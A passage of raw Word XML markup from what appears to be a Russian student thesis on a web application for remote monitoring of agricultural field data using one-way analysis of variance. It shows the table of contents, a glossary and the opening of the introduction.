      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19AD01D2" w14:textId="6F8191C7" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709242" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5 Поддержка программы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709242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1D2B8DCA" w14:textId="6D3398FF" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709243" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.1 Тестирование программы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709243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2AEB3036" w14:textId="4C1F5816" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709244" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.2 Разработка документации</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709244 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>82</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BA55971" w14:textId="33247187" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709245" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6 Опытная и промышленная эксплуатация</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709245 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31650504" w14:textId="1F8DC452" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709246" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ЗАКЛЮЧЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709246 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B7E3071" w14:textId="4DDDE8AF" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709247" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709247 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>87</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03150531" w14:textId="640B818D" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709248" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">ПРИЛОЖЕНИЕ А (листинг файла </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>indexcharts</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>j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48 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5874EDBC" w14:textId="3FD300FF" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709249" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ПРИЛОЖЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Б</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> (</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>листинг</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>файла</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> AccountService.cs)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709249 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18D12356" w14:textId="1ED8D353" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709250" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">ПРИЛОЖЕНИЕ Г (Содержимое файла работы дисперсионного анализа </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Anova</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>c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50 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A456326" w14:textId="5614956C" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709251" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ПРИЛОЖЕНИЕ Д (Модульные тесты для проверки работоспособности алгоритма дисперсионного анализа)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709251 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>114</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42F97887" w14:textId="3057615B" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709252" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ПРИЛОЖЕНИЕ Е (Справка о внедрении программного продукта на предприятии)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709252 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>116</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79721EE9" w14:textId="7791B712"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Pr="005A683C" w:rsidRDefault="008F05DC" w:rsidP="00892905">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A683C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ГЛОССАРИЙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76432AE1" w14:textId="1CBA4293" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t xml:space="preserve">Математическая статистика – наука, разрабатывающая математические методы систематизации и использования </w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1">
        <w:t>эмпирических</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> данных для научных и практических выводов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC44A52" w14:textId="33BF3003" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">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8E6783">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8E6783">
      <w:r>
        <w:t>Выборка – данные, которые получены при наблюдениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB54D2B" w14:textId="5EECF2B4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">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8E6783">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8E6783">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8E6783">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w:t>
      </w:r>
      <w:r w:rsidR="00F61E3D">
        <w:lastRenderedPageBreak/>
        <w:t>хранение и обработку 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8E6783">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8E6783">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8E6783">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8E6783">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8E6783">
      <w:r>
        <w:t>БД – База данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09E251" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:sectPr w:rsidR="0093378B" w:rsidSect="000671FA">
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="6"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693C292C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00F73005" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc161568200"/>
      <w:bookmarkStart w:id="4" w:name="_Toc162709227"/>
      <w:r w:rsidRPr="00F73005">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>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5C8713B4" w:rsidR="0093378B" w:rsidRPr="00BD5112"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5" w:name="_Toc122277543"/>
      <w:r w:rsidR="00BD5112">
        <w:t>, в частности</w:t>
      </w:r>
      <w:r w:rsidR="00AA0AC4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BD5112">
        <w:t xml:space="preserve"> в предметной области сельского хозяйства, автоматизировав мониторинг агроэкосистемы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09150931" w14:textId="582F1BE3" w:rsidR="00502C9D" w:rsidRDefault="00502C9D" w:rsidP="00181E5B">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685CA06B" w:rsidR="0093378B" w:rsidRPr="00BD5112" w:rsidRDefault="0093378B" w:rsidP="005019EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464AEF">
        <w:t>Предметом исследования явля</w:t>
      </w:r>
      <w:r>
        <w:t>ются</w:t>
      </w:r>
      <w:r w:rsidR="00BD5112" w:rsidRPr="00BD5112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD5112">
        <w:t>методы обработки данных для проведения анализа,</w:t>
      </w:r>
      <w:r w:rsidR="00AA0AC4">
        <w:t xml:space="preserve"> в частности,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> алгоритм однофакторного дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidR="00BD5112" w:rsidRPr="00BD5112">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24087435" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc161568201"/>
      <w:bookmarkStart w:id="7" w:name="_Toc162709228"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="735EE281" w14:textId="6D8026DB" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="008A26DF" w:rsidP="00464AEF">
      <w:r>
        <w:t>М</w:t>
      </w:r>
      <w:r w:rsidR="00502C9D">
        <w:t xml:space="preserve">ониторинг и анализ </w:t>
      </w:r>
      <w:r>
        <w:t>полевых</w:t>
      </w:r>
      <w:r w:rsidR="00502C9D">
        <w:t xml:space="preserve"> данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и наблюдений</w:t>
      </w:r>
      <w:r w:rsidR="00502C9D">
        <w:t xml:space="preserve"> исследователями в сфере сельского хозяйства и агрономами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дистанционно с помощью сети интернет</w:t>
      </w:r>
      <w:r w:rsidR="00502C9D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24531F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc122277544"/>
      <w:bookmarkStart w:id="9" w:name="_Toc161568202"/>
      <w:bookmarkStart w:id="10" w:name="_Toc162709229"/>
      <w:r w:rsidRPr="00541C36">
        <w:t>Задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7E95813C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005D0EAE">
      <w:pPr>
        <w:pStyle w:val="12"/>
